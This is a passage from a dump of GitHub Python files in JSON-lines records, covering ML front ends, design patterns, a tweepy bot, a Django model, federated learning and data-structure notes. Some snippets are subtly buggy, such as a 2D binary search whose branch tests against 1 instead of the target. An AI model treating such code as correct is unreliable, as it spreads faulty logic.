Defaults to [\"lgb\",\"rf\",\"xgb\"].\\n\n metric (str, optional): The metric with which the model should \\\n be compared.\\n\n excluded_cols (list, optional): Columns which should not be used \\\n in the modelling process.\\n\n n_fold (int, optional): Number of folds to be used in k-fold cross \\\n validation.\\n\n cv_type (str, optional): Type of cross validation to perform.\\n\n num_config (int, optional): Number of model configurations to run during tuning.\n \"\"\"\n mle = MLExecutor(\n df_,\n target_col=target_col,\n task=task,\n model_list=model_list,\n metric=metric,\n exclude_cols=excluded_cols,\n cv=cv_type,\n n_fold=n_fold,\n max_evals=num_config,\n )\n st.write(\"Models executed successfully!\")\n st.balloons()\n st.dataframe(mle.val_results)\n st.dataframe(mle.test_results)\n\n\ndef take_user_inputs():\n \"\"\"\n Obtain user inputs to be passed to the MLExec object\n \"\"\"\n uploaded_file = st.file_uploader(\"Choose a tabular file to begin\")\n if uploaded_file:\n ## Reading as a pandas dataframe based on format\n suffix = uploaded_file.name.split(\".\")[-1]\n if suffix in [\"xlsx\",\"xls\"]:\n df_ = pd.read_excel(uploaded_file)\n elif suffix in [\"csv\",\"txt\",\"data\"]:\n df_ = pd.read_csv(uploaded_file)\n elif suffix in [\"pkl\"]:\n df_ = pd.read_pickle(uploaded_file)\n elif suffix in [\"json\"]:\n df_ = pd.read_json(uploaded_file)\n\n col_list = list(df_.columns)\n target_col = st.selectbox(\"Please select the target column\",\n col_list)\n excluded_cols = st.multiselect(\"please select columns to exclude (if any)\",\n col_list,\n default=[])\n task = st.selectbox(\"Please select ML task\",\n TASK_OPTIONS)\n model_list = st.multiselect(\"Please select models\",\n MODEL_OPTIONS,\n default=[\"lgb\",\"rf\",\"xgb\"])\n metric = st.selectbox(\"Please select a metric for model comparison\",\n METRIC_OPTIONS[task])\n cv_type = st.selectbox(\"Please cross validation method\",\n CV_OPTIONS)\n if cv_type:\n n_fold = st.slider('Number of k-fold in CV', 1, 10, 2)\n\n num_config = st.slider('Number of model configurations to tune',\n 5, 50, 5)\n response = st.button(\"Click to begin tuning\")\n\n if response:\n return {\"df_\": df_,\n \"target_col\": target_col,\n \"excluded_cols\": excluded_cols,\n \"task\": task,\n \"model_list\": model_list,\n \"metric\": metric,\n \"cv_type\": cv_type,\n \"n_fold\": n_fold,\n \"num_config\": num_config}\n\ndef main():\n \"\"\"\n Main function to handle user inputs, ML execution and displaying output\n \"\"\"\n user_inputs = take_user_inputs()\n\n if user_inputs:\n run_mlexec(**user_inputs)\n\nmain()\n","repo_name":"DivM11/mlexec_frontend","sub_path":"run_frontend.py","file_name":"run_frontend.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38610679741","text":"def binarySearch(arr, i, j, n, m):\n\t## Implementation\n\twhile i <= j:\n\n\t\tmid = i + ((j-i)//2)\n\t\tmid_row = mid // n\n\t\tmid_column = mid % n\n\t\tmid_element = arr[mid_row][mid_column]\n\n\t\tif mid_element == x:\n\t\t\treturn mid_row, mid_column\n\t\telif mid_element < x:\n\t\t\ti = mid + 1\n\t\telif mid_element > 1:\n\t\t\tj = mid -1\n\n\treturn -1\n\n## Driver Code\narr = [[1, 2, 3, 5], [7, 8, 10, 12], [14, 17, 18, 20]]\ni = 0 # Start index\nx = 17 # Search number\nn = len(arr[0]) # Number of columns\nm = len(arr) # Number of rows\nj = (m * n) - 1 # end index\n\nprint(binarySearch(arr, i, j, n, 
m))\n\n","repo_name":"sivayuvi79/DSA-Python","sub_path":"Array/BInarySearchOn2d.py","file_name":"BInarySearchOn2d.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35184141599","text":"\"\"\"\nProxy is a structural design pattern that lets you provide a substitute or \nplaceholder for another object. A proxy controls access to the original \nobject, allowing you to perform something either before or after the \nrequest gets through to the original object.\n\nInstead of using object X use proxy of X which will\ntake care for some additional stuff (security, logging... it can\ndo something before/after or during the main action where object X is used)\n\"\"\"\n\n\nclass GuildVault:\n\n def view(self, player):\n print('Player \"%s\" is viewing the guild vault' % player.name)\n\n\nclass ProxyGuildVault:\n\n def __init__(self, *args, **kwargs):\n self.guild_vault = GuildVault(*args, **kwargs)\n self.black_list_players = ['Mogka', 'Banana']\n\n def view(self, player):\n if player.name in self.black_list_players:\n print('!!! Player \"%s\" is not allowed to view '\n 'the guild vault !!!' % player.name)\n return\n\n self.guild_vault.view(player)\n\n\nclass Player:\n\n def __init__(self, name):\n self.name = name\n\n\ndef run():\n mogka = Player('Mogka')\n ra = Player('Ra')\n guild_vault = GuildVault()\n proxy_vault = ProxyGuildVault()\n\n players = [mogka, ra]\n print(' * plain vault')\n for player in players:\n guild_vault.view(player)\n\n print(' * proxy vault')\n for player in players:\n proxy_vault.view(player)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"dos09/PythonDesignPatterns","sub_path":"src/design_patterns/structural/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1990881217","text":"'''\nFirst Version: contents from subreddits\n'''\nimport configparser\nfrom collections import namedtuple\nimport tweepy\n\nTweet = namedtuple('Tweet', ['Primary', 'Second'])\n\n\nclass Twitter:\n '''\n class to load config info and send tweets\n '''\n\n def __init__(self):\n config = Twitter.__read_config()\n auth = tweepy.OAuthHandler(\n config['consumer_key'],\n config['consumer_secret'])\n auth.set_access_token(\n config['access_token'],\n config['access_token_secret'])\n self.__api = tweepy.API(auth)\n\n def send_tweet(self, message, reply_id=None):\n '''\n sends a tweet and prints any errors.\n '''\n try:\n if reply_id:\n status = self.__api.update_status(message, reply_id)\n else:\n status = self.__api.update_status(message)\n except tweepy.TweepError as tweep_error:\n print(tweep_error)\n return status\n\n @staticmethod\n def __read_config():\n '''\n reads from 'tweepy.ini' which must be in the working directory\n '''\n config = configparser.ConfigParser()\n config.read('tweepy.ini')\n return {key: config['bot1'][key] for key in config['bot1']}\n\n @staticmethod\n def __write_config(config_dict):\n '''\n write 'tweepy.ini' with updated values\n '''\n config = configparser.ConfigParser()\n config.read('tweepy.ini')\n for key in config_dict:\n config['bot1'][key] = config_dict[key]\n with open('tweepy.ini', 'w') as configfile:\n config.write(configfile)\n\n @staticmethod\n def refresh_access_token():\n '''\n interactive function that gets the access token and access token secret\n '''\n config = Twitter.__read_config()\n auth = 
tweepy.OAuthHandler(consumer_key=config['consumer_key'],\n consumer_secret=config['consumer_secret'])\n print('navigate to: ' + auth.get_authorization_url())\n print('return with the pin')\n pin = input('type the pin here:')\n auth.get_access_token(pin)\n config['access_token'] = auth.access_token\n config['access_token_secret'] = auth.access_token_secret\n Twitter.__write_config(config)\n return config\n","repo_name":"seanneal/tweetbot","sub_path":"twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30660607943","text":"from django.db import models\nfrom users.models import CustomUser\nimport uuid\n\n# Create your models here.\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(CustomUser, on_delete=models.CASCADE,related_name='userr')\n profile_id = models.UUIDField(default=uuid.uuid4)\n \n slug = models.SlugField(max_length=50)\n age = models.PositiveIntegerField()\n marital_status_choices = [\n ('NM', 'Never Married'),\n ('D', 'Divorced'),\n ('AD', 'Awaiting Divorce'),\n ]\n marital_status = models.CharField(\n max_length=5, choices=marital_status_choices)\n DOB = models.DateField()\n religion_choices = [\n ('H', 'Hindu'),\n ('M', 'Muslim'),\n ('C', 'Christian'),\n ('B', 'Buddhist'),\n ('S', 'Sikh'),\n ('J', 'Jain'),\n ('JW', 'Jewish'),\n ('O', 'Other'),\n ('N', 'No Religion'),\n ]\n religion = models.CharField(max_length=5, choices=religion_choices)\n # gotra\n location_choices = [\n ('achham', 'Achham'),\n ('arghakhanchi', 'Arghakhanchi'),\n ('baglung', 'Baglung'), ('baitadi', 'Baitadi'),\n ('bajhang', 'Bajhang'), ('bajura', 'Bajura'),('banke', 'Banke'), ('bara', 'Bara'),\n ('bardiya', 'Bardiya'), ('bhaktapur', 'Bhaktapur'), ('bhojpur', 'Bhojpur'),\n ('chitwan', 'Chitwan'), ('dadeldhura', 'Dadeldhura'), ('dailekh', 'Dailekh'),\n ('dang', 'Dang'), ('darchula', 'Darchula'), ('dhading', 'Dhading'),\n ('dhankuta', 'Dhankuta'),\n ('dhanusa', 'Dhanusa'), ('dolakha', 'Dolakha'),\n ('dolpa', 'Dolpa'), ('doti', 'Doti'),\n ('gorkha', 'Gorkha'), ('gulmi', 'Gulmi'), \n ('humla', 'Humla'), ('ilam', 'Ilam'), \n ('jajarkot', 'Jajarkot'), ('jhapa', 'Jhapa'),\n ('jumla', 'Jumla'), ('kailali', 'Kailali'),\n ('kalikot', 'Kalikot'), ('kanchanpur', 'Kanchanpur'),\n ('kapilvastu', 'Kapilvastu'), ('kaski', 'Kaski'), \n ('kathmandu', 'Kathmandu'), ('kavrepalanchok', 'Kavrepalanchok'),\n ('khotang', 'Khotang'), ('lalitpur', 'Lalitpur'), ('lamjung', 'Lamjung'),\n ('mahottari', 'Mahottari'), ('makawanpur', 'Makawanpur'), ('manang', 'Manang'), \n ('morang', 'Morang'), ('mugu', 'Mugu'), ('mustang', 'Mustang'), ('myagdi', 'Myagdi'),\n ('nawalpur', 'Nawalpur'), ('nuwakot', 'Nuwakot'), ('okhaldhunga', 'Okhaldhunga'),\n ('palpa', 'Palpa'), ('panchthar', 'Panchthar'), ('parasi', 'Parasi'), ('parbat', 'Parbat'),\n ('parsa', 'Parsa'), ('pyuthan', 'Pyuthan'), ('ramechhap', 'Ramechhap'), ('rasuwa', 'Rasuwa'),\n ('rautahat', 'Rautahat'), ('rolpa', 'Rolpa'), ('rukum', 'Rukum'),\n ('rukum paschim', 'Rukum Paschim'), ('rupandehi', 'Rupandehi'), ('salyan', 'Salyan'),\n ('sankhuwasabha', 'Sankhuwasabha'), ('saptari', 'Saptari'), ('sarlahi', 'Sarlahi'), \n ('sindhuli', 'Sindhuli'), ('sindhupalchok', 'Sindhupalchok'), ('siraha', 'Siraha'),\n ('solukhumbu', 'Solukhumbu'), ('sunsari', 'Sunsari'), ('surkhet', 'Surkhet'), \n ('syangja', 'Syangja'), ('tanahu', 'Tanahu'), ('taplejung', 'Taplejung'),\n ('terhathum', 'Terhathum'), ('udayapur', 'Udayapur')]\n\n \n location = 
models.CharField(max_length=20, choices=location_choices)\n family_type_choices = [\n ('J', 'Joint'),\n ('N', 'Nuclear'),\n ]\n family_type = models.CharField(max_length=1, choices=family_type_choices)\n Rashi_choices = [\n ('mesh', 'Mesh'),\n ('bris', 'Bris'),\n ('mithun', 'Mithun'),\n ('karkat', 'Karkat'),\n ('singha', 'Singha'),\n ('kanya', 'Kanya'),\n ('tula', 'Tula'),\n ('brischik', 'Brischik'),\n ('dhanu', 'Dhanu'),\n ('makar', 'Makar'),\n ('kumba', 'Kumba'),\n ('min', 'Min'),\n ]\n Rashi = models.CharField(max_length=10, choices=Rashi_choices)\n education_choices = [\n ('slc','Slc'),\n ('high School','High School'),\n ('bachelors','Bachelors'),\n ('master','Master'),\n ]\n education = models.CharField(max_length=20, choices=education_choices)\n\n\n\n def __str__(self):\n return self.user.username\n\n \n \n\n\n","repo_name":"Rupesh2056/Lagan-Gatho","sub_path":"userprofile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4660862175","text":"def nlp_sentiment():\n# Imports the Google Cloud client library\n\n\timport argparse\n\timport os\n\tfrom google.cloud import language\n\tfrom google.cloud.language import enums\n\tfrom google.cloud.language import types\n\tfrom google.oauth2 import service_account\n\n\tcreds = service_account.Credentials.from_service_account_file() # insert .json file path here including the .json file's name with double air quotes (\"\")\n\tclient = language.LanguageServiceClient(\n\t credentials=creds,\n\t )\n\n\t# The text to analyze\n\ttext = u'The Cloud Natural Language supports a variety of languages. These languages are specified within a request using the optional language parameter.'\n\t\n\tdocument = types.Document(\n\t\tcontent=text,\n\t\ttype=enums.Document.Type.PLAIN_TEXT)\n\n\t\t# Detects the sentiment of the text\n\tsentiment = client.analyze_sentiment(document=document).document_sentiment\n\n\tprint('Text: {}'.format(text))\n\tprint('Sentiment: {}, {}'.format(sentiment.score, sentiment.magnitude))\n\n\t\n\tsentences = text.split('.')\n\n\tscore = [0 for i in range(len(sentences))]\n\tmagnitude = [0 for i in range(len(sentences))]\n\n\tfor i in range(0,len(sentences)):\n\n\t\tdocument = types.Document(\n\t\t content=sentences[i],\n\t\t type=enums.Document.Type.PLAIN_TEXT)\n\n\t\t# Detects the sentiment of the text\n\t\tsentiment = client.analyze_sentiment(document=document).document_sentiment\n\n\t\tscore[i] = sentiment.score\n\t\tmagnitude[i] = sentiment.magnitude\n\n\n\tlargest_impact = max(score)\n\n\tselector = score.index(largest_impact)\n\n\tprint('Text: {}'.format(sentences[selector]))\n\tprint('is the sentence with largest sentiment score individually with a score of {}'.format(largest_impact))\n\n\treturn \n\nnlp_sentiment()","repo_name":"huda-irs/Project-2-Part-1b","sub_path":"nlp_sentiment.py","file_name":"nlp_sentiment.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7384288051","text":"import sys\nimport numpy as np\n\nsys.path.insert(len(sys.path), '../include/')\nfrom Qphase import *\n\n\n# Average the two-point function over the momenta for each Qsq,\n# flavor (ppm,pmm) and direction (fwd,bwd)\ndef average_twop(twop_raw,Qsq,twopInfo,avg_type=\"all\",pflv='',pdrc=''):\n\n Ntraj = twopInfo['Ntraj']\n T = twopInfo['T']\n nQsq = len(Qsq)\n \n twop = np.zeros((nQsq, Ntraj, T, 
1),dtype=np.complex128) \n \n if(avg_type==\"all\"):\n twop_drct = []\n twop_drct_aver = []\n for msq in range(nQsq):\n twop_drct.append({})\n twop_drct_aver.append({})\n for drct in drct_list2pt:\n twop_drct[msq][drct] = []\n for flav in flav_list2pt:\n twop_drct[msq][drct].append( np.average(twop_raw[msq][(flav,drct)],axis=2) ) # Average over the momenta for each Qsq, for each flavor and direction\n \n twop_drct_aver[msq][drct] = np.average(twop_drct[msq][drct],axis=0) # Average over the flavors, for each Qsq and direction\n\n # Average over forward, backward directions\n for ic in range(Ntraj):\n for it in range(T):\n twop[msq][ic][it][0] = 0.5 * ( twop_drct_aver[msq]['fwd'][ic][it] - twop_drct_aver[msq]['bwd'][ic][(T-it)%T] )\n\n elif(avg_type==\"momenta\"):\n if(pflv=='' or pdrc==''):\n print( 'average_twop: Variables pflv and pdrc must be defined when avg_type = \"%s\"' % (avg_type) )\n sys.exit()\n\n print( 'average_twop: Averaging over momenta, flavor = %s , direction = %s' % (pflv,pdrc) )\n for msq in range(nQsq):\n twop[msq] = np.reshape( np.average(twop_raw[msq][(pflv,pdrc)],axis=2) , (Ntraj,T,1) ) # Average over the momenta for each Qsq, for flavor 'ppm' and direction 'fwd'\n\n \n return twop\n#---------------------------------------------------------------------------------------\n \n \n# Function which performs a constant fit\ndef constant_fit(values):\n\n Sy = sum( map(lambda x:x,values['val']/(values['err']**2)) ) # Sy = SUM_i val[i]/err[i]**2\n S = sum( map(lambda x:1.0/(x*x),values['err']) ) # S = SUM_i ( 1/err[i] )^2\n\n return Sy/S\n#---------------------------------------------------------------------------------------\n\n\n# Function which calculates the chi_square for a constant fit\ndef chisq_const(values, fit):\n\n return sum( map(lambda x:x,((values['val']-fit)/values['err'])**2) )\n#---------------------------------------------------------------------------------------\n","repo_name":"ckallidonis/Q-PHaSe","sub_path":"lib/Qphase_math.py","file_name":"Qphase_math.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13256496310","text":"from client import CifarClient, NUM_CLIENTS, Net\nNUM_EPOCHS = 300\nclients = []\n\nglobal_client = CifarClient(-1)\n\ndef initialize_clients(num_clients=3):\n\tprint(\"Initializing clients...\")\n\tfor i in range(num_clients):\n\t clients.append(CifarClient(i))\n\ndef evaluate_local_clients():\n\tprint(\"Evaluating clients...\")\n\tfor client in clients:\n\t print(client.evaluate(global_client.get_parameters()))\n\ndef train_local_clients():\n\tprint(\"Training clients...\")\n\tfor client in clients:\n\t\tclient.fit(global_client.get_parameters())\n\ndef aggregate_local_clients():\n\tprint(\"Aggregating clients...\")\n\tparams = None\n\tfor client in clients:\n\t\tclient_params = client.get_parameters()\n\t\tif params is None:\n\t\t\tparams = [cparam / len(clients) for cparam in client_params]\n\t\telse:\n\t\t\tfor param, cparam in zip(params, client_params):\n\t\t\t\tparam += cparam / len(clients)\n\t\t# print(\"CLIENT PARAMS\", client_params)\n\tglobal_client.set_parameters(params)\n\ninitialize_clients(NUM_CLIENTS)\nfor epoch in range(NUM_EPOCHS):\n\tprint(\"************* Epoch: {} 
*************\".format(epoch))\n\tevaluate_local_clients()\n\ttrain_local_clients()\n\taggregate_local_clients()\n","repo_name":"tsgoten/bcfl","sub_path":"clients/central.py","file_name":"central.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35991324522","text":"from collections import OrderedDict, defaultdict, ChainMap\nfrom types import MappingProxyType\n\n# ---------------СЛОВАРИ---------------\n\n# OrderedDict - сохранит порядок следования ключей\n\nd = OrderedDict(one=1, two=2, three=3)\nd['четыре'] = 4\nprint(d)\n# OrderedDict([('one', 1), ('two', 2), ('three', 3), ('четыре', 4)])\n\n# collections .defaultdict — возвращает значения, заданные по умолчанию для отсутствующих ключей\ndd = defaultdict(list)\n# Попытка доступа к отсутствующему ключу его создает и\n# инициализирует, используя принятую по умолчанию фабрику, # то есть в данном примере list():\ndd['собаки'].append('Руфус')\ndd['собаки'].append('Кэтрин')\ndd['собаки'].append('Сниф')\nprint(dd['собаки'])\n# ['Руфус', 'Кэтрин', 'Сниф']\n\n# collections .ChainMap — производит поиск в многочисленных словарях как в одной таблице соответствия\ndict1 = {'один': 1, 'два': 2}\ndict2 = {'три': 3, 'четыре': 4}\nchain = ChainMap(dict1, dict2)\nprint(chain)\n# ChainMap({'один': 1, 'два': 2}, {'три': 3, 'четыре': 4})\nprint(chain['три'])\n# 3\nprint(chain['один'])\n# 1\n\n# types .MappingProxyType — обертка для создания словарей только для чтения\nwritable = {'один': 1, 'два': 2} # доступный для обновления\nread_only = MappingProxyType(writable) # Этот представитель/прокси с доступом только для чтения:\nprint(read_only['один'])\n# 1\n# read_only['один'] = 23\n# TypeError: \"'mappingproxy' object does not support item assignment\"\n# Обновления в оригинале отражаются в прокси:\nwritable['один'] = 42\nprint(read_only)\n# mappingproxy({'один': 42, 'один': 2})\n\n# -----------МАССИВЫ--------------\n# lis - динамически массив, структура следит за выделяемым объемео резервирования памяти при операция\n# удаления, добавления и вставки\nlist_ = [1, 2, 3]\n\n# кортежи не изменные тип данных\nmy_tuple = 1, 2, 3\nprint(my_tuple[0])\n# my_tuple[0] = 23\n# TypeError: 'tuple' object does not support item assignment\n\n# массивы - «типизированными массивами», ограниченными единственным типом данных. 
чтоявляется более пространственно\n# эффективным и позволяет хранить данные более плотно чем\nimport array\narr = array.array('f', (1.0, 0.5, 1.5, 2.0))\nprint(arr[1])\nprint(arr)\n# могут меняться\narr[1] = 3\nprint(arr)\narr.append(43)\nprint(arr)\n# # Массивы — это \"типизированные\" структуры данных:\n# arr[1] = 'привет'\n# TypeError: \"must be real number, not str\"\n\n# Строки - неизменяемы\narr = 'abcd'\n# arr[1] = 'e'\n# TypeError:\n# \"'str' object does not support item assignment\"\n\nprint(list(arr))\nprint(''.join(list(arr)))\n\n\n# bytes — неизменяемые массивы одиночных байтов\n# целых чисел в диапазоне 0 ≤ x ≤ 255\narr = bytes((0, 1, 2, 3))\nprint(arr[1])\n# 1\n# Байтовые литералы имеют свой собственный синтаксис:\nprint(arr)\nb'x00x01x02x03'\narr = b'x00x01x02x03'\n\n# # Байты неизменяемы:\n# >>> arr[1] = 23\n# TypeError:\n# \"'bytes' object does not support item assignment\"\n# >>> del arr[1]\n# TypeError:\n# \"'bytes' object doesn't support item deletion\"\n\n# bytearray — изменяемые массивы одиночных байтов\n# последовательность целых чисел в диапазоне 0 ≤ x ≤ 255\n\narr = bytearray((0, 1, 2, 3))\nprint(arr[1])\n# 1\n# Метод repr для bytearray:\nprint()\n# bytearray(b'x00x01x02x03')\n# Байтовые массивы bytearray изменяемы:\narr[1] = 23\nprint(arr)\n# bytearray(b'x00x17x02x03')\nprint(arr[1])\n# 23\n# Байтовые массивы bytearray могут расти и сжиматься в размере:\ndel arr[1]\narr.append(42)\nprint(arr)\nbytearray(b'x00x02x03*')\n# Байтовые массивы bytearray могут содержать только \"байты\"\n# # (целые числа в диапазоне 0 <= x <= 255)\n# >>> arr[1] = 'привет'\n# TypeError: \"an integer is required\"\n# >>> arr[1] = 300\n# ValueError: \"byte must be in range(0, 256)\"\n# # Bytearrays может быть преобразован в байтовые объекты: # (Это скопирует данные)\n# >>> bytes(arr)\n# b'x00x02x03*'\n\n# ----------------Записи и структуры----------------------\n# Рекомендации по структурам данных для органиазции записей:\n#\n# У вас есть всего несколько (2–3) полей: использование обыкновенного объекта-кортежа может подойти, если порядок\n# следования полей легко запоминается или имена полей излишни. Например, представьте точку (x, y, z) в трехмерном\n# пространстве.\n#\n# Вам нужны неизменяемые поля: в данном случае обыкновенные кортежи, collections.namedtuple и typing.NamedTuple,\n# дадут неплохие возмож ности для реализации этого типа объекта данных.\n#\n# Вам нужно устранить имена полей, чтобы избежать опечаток: вашими друзьями здесь будут collections.namedtuple и\n# typing.NamedTuple.\n#\n# Вы не хотите усложнять: обыкновенный объект-словарь может быть хорошим вариантом из-за удобного синтаксиса,\n# который сильно напоминает JSON. Или types .SimpleNamespace — причудливый атрибутивный доступ\n#\n# Вам нужен полный контроль над вашей структурой данных: самое время написать собственный класс с\n# методами-модификаторами (сеттерами) и методами-получателями (геттерами) @property.\n#\n# Вам нужно добавить в объект поведение (методы): вам следует на- писать собственный класс с нуля либо путем\n# расширения collections. 
namedtuple или typing.NamedTuple.\n#\n# Вам нужно плотно упаковать данные, чтобы сериализовать их для записи на жесткий диск или отправить их по Сети:\n# самое время навести справки по поводу struct.Struct, потому что этот объект представляет собой превосходный\n# вариант использования.\n\n# ----------МНОЖЕСТВА-------------\n# set\nvowels = {'а', 'о', 'э', 'и', 'у', 'ы', 'е', 'е', 'ю', 'я'}\nprint('э' in vowels)\n\n# frozenset — неизменяемые множества\nvowels = frozenset({'а', 'о', 'э', 'и', 'у', 'ы', 'е', 'е', 'ю','я'})\n# vowels.add('р')\n# AttributeError \"'frozenset' object has no attribute 'add'\"\n\n# Множества frozenset хешируемы и могут\n# использоваться в качестве ключей словаря:\nd = { frozenset({1, 2, 3}): 'привет' }\nprint(d[frozenset({1, 2, 3})])\n# 'привет'\n\n# collections .Counter — мультимножества\nfrom collections import Counter\ninventory = Counter()\nloot = {'клинок': 1, 'хлеб': 3}\ninventory.update(loot)\nprint(inventory)\n# Counter({'клинок': 1, 'хлеб': 3})\nmore_loot = {'клинок': 1, 'яблоко': 1}\ninventory.update(more_loot)\nprint(inventory)\nCounter({'клинок': 2, 'хлеб': 3, 'яблоко': 1})\n\nprint(len(inventory))\n# 3 # Количество уникальных элементов\nprint(sum(inventory.values()))\n# 6 # Общее количество элементов\n\n#-----------СТЭКИ LIFO------------\n# простые встроенные через list\nlist_ = []\nlist_.append(1)\nlist_.append(2)\nlist_.pop()\nlist_.pop()\n\n# collections .deque — быстрые и надежные стеки\n# Класс deque реализует очередь с двусторонним доступом, которая под- держивает добавление и удаление\n# элементов с любого конца за O(1) (неамортизируемое) время.\n\nfrom collections import deque\ns = deque()\ns.append('есть')\ns.append('спать')\ns.append('программировать')\nprint(s)\n# deque(['есть', 'спать', 'программировать'])\nprint(s.pop())\n# 'программировать'\ns.pop()\n# 'спать'\n\n# deque .LifoQueue — семантика блокирования для параллельных вычислений\n\nfrom queue import LifoQueue\ns = LifoQueue()\ns.put('есть')\ns.put('спать')\ns.put('программировать')\nprint(s)\n# \nprint(s.get())\n# 'программировать'\nprint(s.get())\n# 'спать'\nprint(s.get())\n# 'есть'\n# print(s.get_nowait())\n# raise queue.Empty\n# s.get()\n# Блокирует / ожидает бесконечно...\n\n\n# лучше всего использовать список list (append и pop) или\n# двустороннюю очередь deque.\n\n# --------------ОЧЕРЕДИ FIFO-----------------\n# list - ужастно мееееедленная очередь\nq = []\nq.append('есть')\nq.append('спать')\nq.append('программировать')\nprint(q)\n# ['есть', 'спать', 'программировать']\n# Осторожно: это очень медленная операция! О(n) - нужно сдвинуть все эелементы очереди\nq.pop(0)\n# 'есть'\n\n\n# ��о есть решение - collections .deque — быстрые и надежные очереди\n#\n# Класс deque реализует очередь с двусторонним доступом, которая под- держивает добавление и удаление элементов\n# с любого конца за O(1) (неамортизируемое) время. 
\n# Но есть решение - collections.deque — быстрые и надежные очереди\n#\n# Класс deque реализует очередь с двусторонним доступом, которая поддерживает добавление и удаление элементов\n# с любого конца за O(1) (неамортизируемое) время. Поскольку двусторонние очереди одинаково хорошо поддерживают\n# добавление и удаление элементов с любого конца, они могут служить в качестве очередей и в качестве стеков.\n\nfrom collections import deque\nq = deque()\nq.append('есть')\nq.append('спать')\nq.append('программировать')\nprint(q)\n# deque(['есть', 'спать', 'программировать'])\nq.popleft()\n# 'есть'\nq.popleft()\n# 'спать'\nq.popleft()\n# 'программировать'\n# q.popleft()\n# IndexError: \"pop from an empty deque\"\n\n# queue.Queue — семантика блокирования для параллельных вычислений\nfrom queue import Queue\nq = Queue()\nq.put('есть')\nq.put('спать')\nq.put('программировать')\nprint(q)\n# <queue.Queue object at 0x...>\nq.get()\n# 'есть'\nq.get()\n# 'спать'\nq.get()\n# 'программировать'\n# q.get_nowait()\n# queue.Empty\n# q.get()\n# Блокирует / ожидает бесконечно...\n\n# multiprocessing.Queue — очереди совместных заданий\n# Такая реализация очереди совместных заданий позволяет выполнять параллельную обработку находящихся\n# в очереди элементов многочисленными параллельными рабочими процессами\n\nfrom multiprocessing import Queue\nq = Queue()\nq.put('есть')\nq.put('спать')\nq.put('программировать')\nprint(q)\n# <multiprocessing.queues.Queue object at 0x...>\nq.get()\n# 'есть'\nq.get()\n# 'спать'\nq.get()\n# 'программировать'\n# q.get()\n# Блокирует / ожидает бесконечно...\n\n# Вывод: Если вы не ищете поддержку параллельной обработки, то реализация, предлагаемая очередью collections.deque,\n# является превосходным вариантом по умолчанию для реализации в Python\n\n# -----------------Очереди с приоритетом--------\n# Если list, тогда — поддержание сортируемой очереди вручную\n\nq = []\nq.append((2, 'программировать'))\nq.append((1, 'есть'))\nq.append((3, 'спать'))\n# ПРИМЕЧАНИЕ: Не забудьте выполнить пересортировку всякий раз,\n# когда добавляется новый элемент, либо используйте bisect.insort().\nq.sort(reverse=True)\nwhile q:\n    next_item = q.pop()\n    print(next_item)\n# Результат:\n# (1, 'есть')\n# (2, 'программировать')\n# (3, 'спать')\n\n# heapq — двоичные кучи на основе списка\n\nimport heapq\nq = []\nheapq.heappush(q, (2, 'программировать'))\nheapq.heappush(q, (1, 'есть'))\nheapq.heappush(q, (3, 'спать'))\nwhile q:\n    next_item = heapq.heappop(q)\n    print(next_item)\n# Результат:\n# (1, 'есть')\n# (2, 'программировать')\n# (3, 'спать')\n\n# queue.PriorityQueue — красивые очереди с приоритетом (на базе heapq)\nfrom queue import PriorityQueue\nq = PriorityQueue()\nq.put((2, 'программировать'))\nq.put((1, 'есть'))\nq.put((3, 'спать'))\nwhile not q.empty():\n    next_item = q.get()\n    print(next_item)\n# Результат:\n# (1, 'есть')\n# (2, 'программировать')\n# (3, 'спать')\n\n# Вывод: Реализация queue.PriorityQueue выбивается из общего ряда. Такая реализация должна быть предпочтительным\n# вариантом. Если требуется избежать издержек, связанных с блокировкой очереди queue.PriorityQueue,\n# то непосредственное использование модуля heapq — отличный выбор.\n\n\n","repo_name":"GizarIR/clearpython","sub_path":"struct_of_data.py","file_name":"struct_of_data.py","file_ext":"py","file_size_in_byte":15235,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72301013282","text":"# You're given two Linked Lists of potentially unequal length. Each Linked List represents a non-negative Integer, where each node in the Linked List is a digit of that integer, and the first node in each Linked List always represents the least significant digit of the integer. 
Write a function that returns the head of a new Linked List that represents the sum of the integers represented by the two input Linked Lists.\n\n# Each LinkedList node has an integer [value] as well as a [next] node pointing to the next node in the list or to None/null if it's the tail of the list.\n\n# The value of each LinkedList node is always in the range of 0 - 9\n\n# Note: your function must create and return a new Linked List, and you're not allowed to modify either of the input Linked Lists.\n\n# This is an input class. Do not edit.\n\n# -------------Naive Solution | Runs in O(m+n) | Takes the same space too ------------------------\n\nclass LinkedList:\n    def __init__(self, value):\n        self.value = value\n        self.next = None\n\n\ndef sumOfLinkedLists(linkedListOne, linkedListTwo):\n    firstNumber = []\n    while linkedListOne:\n        firstNumber.append(linkedListOne.value)\n        linkedListOne = linkedListOne.next\n    firstNumber.reverse()\n    firstNumber = [str(i) for i in firstNumber]\n    \n    secondNumber = []\n    while linkedListTwo:\n        secondNumber.append(linkedListTwo.value)\n        linkedListTwo = linkedListTwo.next\n    secondNumber.reverse()\n    secondNumber = [str(i) for i in secondNumber]\n    \n    first = int(\"\".join(firstNumber))\n    second = int(\"\".join(secondNumber))\n\n    # Build the result list from the digits of the sum; prepending 